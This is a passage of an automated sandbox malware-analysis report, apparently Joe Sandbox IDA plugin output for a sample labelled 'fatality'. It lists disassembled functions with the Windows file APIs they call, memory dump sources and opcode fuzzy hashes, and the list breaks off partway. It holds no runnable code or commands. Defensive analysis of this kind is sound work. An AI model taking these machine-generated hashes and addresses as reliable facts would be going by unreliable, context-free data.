                                                                                                                                                            Function 008E9F7A Relevance: 1.6, APIs: 1, Instructions: 111fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • WriteFile.KERNELBASE(?,?,?,?,00000000,?,00000001,?,?,?,?,008ED343,00000001,?,?,?), ref: 008EA011
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                            • Opcode ID: 155915876cdea3549fb88fe7f7b3e296690891e0d42b957bc57a05c37195b9fb
                                                                                                                                                            • Instruction ID: 2efc87f0ce8ff8ac2ddea783f7290c94a2d96b59d4d993538ae838e5142627c3
                                                                                                                                                            • Opcode Fuzzy Hash: 155915876cdea3549fb88fe7f7b3e296690891e0d42b957bc57a05c37195b9fb
                                                                                                                                                            • Instruction Fuzzy Hash: AD31A231208385EFDB18CF25D808BAE77A5FF96B15F044919F581D7290CBB5AD48CBA2
                                                                                                                                                            Function 008E13DC Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E13E1
                                                                                                                                                              • Part of subcall function 008E5E37: __EH_prolog.LIBCMT ref: 008E5E3C
                                                                                                                                                              • Part of subcall function 008ECE40: __EH_prolog.LIBCMT ref: 008ECE45
                                                                                                                                                              • Part of subcall function 008EB505: __EH_prolog.LIBCMT ref: 008EB50A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 20bb52fe596e354772744109906a64e7696bd28b4abd4e3009bd46171a67c742
                                                                                                                                                            • Instruction ID: 46b772f4ad876b6c4dee51191e4e79040b6416e150f4309b7e8fb062685df822
                                                                                                                                                            • Opcode Fuzzy Hash: 20bb52fe596e354772744109906a64e7696bd28b4abd4e3009bd46171a67c742
                                                                                                                                                            • Instruction Fuzzy Hash: 31414CB0905B449ED724DF398885AE6FAE5FF19300F50492EE5FEC3282CB316654CB11
                                                                                                                                                            Function 049366F7 Relevance: 1.6, APIs: 1, Instructions: 90COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04936706
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1732841992.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_4930000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExitProcessUser
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3902816426-0
                                                                                                                                                            • Opcode ID: 1735bb0fbf0b971dfc84fee1ef2809624d393c64c5af300b9e6477de7ec9172b
                                                                                                                                                            • Instruction ID: c27f87950bc09eb630ea49372c70d2f24a111a450a5c919064bfeaa5f2849cb2
                                                                                                                                                            • Opcode Fuzzy Hash: 1735bb0fbf0b971dfc84fee1ef2809624d393c64c5af300b9e6477de7ec9172b
                                                                                                                                                            • Instruction Fuzzy Hash: 0C3109B6D1060CEFDB10CFD1C844BEEBBB8FB14336F21861AE421A6180D7785A088F60
                                                                                                                                                            Function 008FB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008FB098
                                                                                                                                                              • Part of subcall function 008E13DC: __EH_prolog.LIBCMT ref: 008E13E1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 3b9dd14a73236a0db1a79823d8230c40743065e8abb2f0525f915696f044a437
                                                                                                                                                            • Instruction ID: 53537959d406f697acaf2030a7ed48a7c7d4e9eef795cf1e9870fc83f44843f9
                                                                                                                                                            • Opcode Fuzzy Hash: 3b9dd14a73236a0db1a79823d8230c40743065e8abb2f0525f915696f044a437
                                                                                                                                                            • Instruction Fuzzy Hash: 85316A75800249DECF15DFA9C951AFEBBB4FF09304F10449AE409B7282DB35AE44CB62
                                                                                                                                                            Function 008E9DA2 Relevance: 1.6, APIs: 1, Instructions: 83timeCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SetFileTime.KERNELBASE(?,?,?,?), ref: 008E9E70
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileTime
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1425588814-0
                                                                                                                                                            • Opcode ID: 0718bd9cf2b0aa7af7d8d252d7d545a55c43d03f6ee5076f0a81eb6fb504150c
                                                                                                                                                            • Instruction ID: f41881700a85d34907336dd8868f59248f8d7fd3384a2cd8df511232ca3b20ca
                                                                                                                                                            • Opcode Fuzzy Hash: 0718bd9cf2b0aa7af7d8d252d7d545a55c43d03f6ee5076f0a81eb6fb504150c
                                                                                                                                                            • Instruction Fuzzy Hash: 8121C131248296EBC714DF36C895AAABBE8FF96304F08491CF4C5C7141D3A9D90CDB62
                                                                                                                                                            Function 008E966E Relevance: 1.6, APIs: 1, Instructions: 82fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,008E9F27,?,?,008E771A), ref: 008E96E6
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                            • Opcode ID: baad8b2dca31810f13b1a3e66e50a83b0c35b7d53733d1e2cd68cb9290863b86
                                                                                                                                                            • Instruction ID: 3552c6a54f666dac2d8daf6d4e2e5b5f4cf17a1cb28fd7810c50fe485ba16bf9
                                                                                                                                                            • Opcode Fuzzy Hash: baad8b2dca31810f13b1a3e66e50a83b0c35b7d53733d1e2cd68cb9290863b86
                                                                                                                                                            • Instruction Fuzzy Hash: 9021B0715043846EE3709A6ACC89BF777ECFB5A324F104A19FAD5C21E1C7B4A884D631
                                                                                                                                                            Function 008E9785 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • ReadFile.KERNELBASE(?,?,00000000,?,00000000,-00000858,?,-00000858,00000000,008E9C22,?,?,00000000,00000800,?), ref: 008E97AD
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileRead
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                            • Opcode ID: e1ce323b457b0b9fc3333a8996cbb041fbcd2c0de1b98907b482e8842b4fa1cc
                                                                                                                                                            • Instruction ID: cff8b1c37ea52c476b476a9d921e8ad16ecc4440d8779626fcfd7d0a623030ea
                                                                                                                                                            • Opcode Fuzzy Hash: e1ce323b457b0b9fc3333a8996cbb041fbcd2c0de1b98907b482e8842b4fa1cc
                                                                                                                                                            • Instruction Fuzzy Hash: 07117030924268EBDF209F67CC046A937B9FB47364F10C539E496C51A0E7F49E48DB61
                                                                                                                                                            Function 008E9E80 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 008E9EC7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                            • Opcode ID: 47b24e939f13dee7181f7577d80d7926f0e8611c561f484dafc8f67986943754
                                                                                                                                                            • Instruction ID: 14f883757aa7641d95f5a8ff7be2bf8feaceccb74b072012d7fde3a86d60c819
                                                                                                                                                            • Opcode Fuzzy Hash: 47b24e939f13dee7181f7577d80d7926f0e8611c561f484dafc8f67986943754
                                                                                                                                                            • Instruction Fuzzy Hash: A211C230604785EBD734C62ACC40BA6B7E8FB46370F504A29E292D26D0E7F0ED45C660
                                                                                                                                                            Function 008EA2B2 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008EC27E: _wcslen.LIBCMT ref: 008EC284
                                                                                                                                                            • CreateDirectoryW.KERNELBASE(00000001,00000000,00000001,?,?,008EA175,?,00000001,00000000,?,?), ref: 008EA2D9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateDirectory_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2011010700-0
                                                                                                                                                            • Opcode ID: 656635d7272f56643f5058782f68a6ca3512cdfa025822bf5d178b7bbf0bf658
                                                                                                                                                            • Instruction ID: e47444e3bb478446514b5a3c41e806370d248f589bdb50175676747c2a75d5c4
                                                                                                                                                            • Opcode Fuzzy Hash: 656635d7272f56643f5058782f68a6ca3512cdfa025822bf5d178b7bbf0bf658
                                                                                                                                                            • Instruction Fuzzy Hash: 1801D831610294AAEF29AB774C09BFD3398FF0BF80F048414F902E6191D754EA81D6B7
                                                                                                                                                            Function 008E9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 5242fb9d333b78285b3d933da089480f4d8cc523a4f870a6d812aa028e6411cc
                                                                                                                                                            • Instruction ID: 800f66da20855ffcfdd7bb005334cbd569dfd6fd2ff1f0ef213e11e2ca4eb7ca
                                                                                                                                                            • Opcode Fuzzy Hash: 5242fb9d333b78285b3d933da089480f4d8cc523a4f870a6d812aa028e6411cc
                                                                                                                                                            • Instruction Fuzzy Hash: 5601A5339005A8ABCF21ABADCC819DEB736FF8A750F014115E922F7212DA748D04C6A2
                                                                                                                                                            Function 008E5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008E5AC2
                                                                                                                                                              • Part of subcall function 008EB505: __EH_prolog.LIBCMT ref: 008EB50A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 72b42953c1c5621dbd853fc3b3026c8dcd7ef62789401fceb10d716535d1c334
                                                                                                                                                            • Instruction ID: e040d44fe2c01dc4c7c02a4048ca7c701ef9601125959a2fbedcaece97746b7b
                                                                                                                                                            • Opcode Fuzzy Hash: 72b42953c1c5621dbd853fc3b3026c8dcd7ef62789401fceb10d716535d1c334
                                                                                                                                                            • Instruction Fuzzy Hash: DF014630910798DED725E7B8C0517EDBBA4EB65304F50848DA556A3283CBB82B08DAA3
                                                                                                                                                            Function 008EA4ED Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • SetFileAttributesW.KERNELBASE(00000001,00000000,00000001,?,008EA325,00000001,008E70E6,?,008EA175,?,00000001,00000000,?,?), ref: 008EA501
                                                                                                                                                              • Part of subcall function 008EBB03: _wcslen.LIBCMT ref: 008EBB27
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
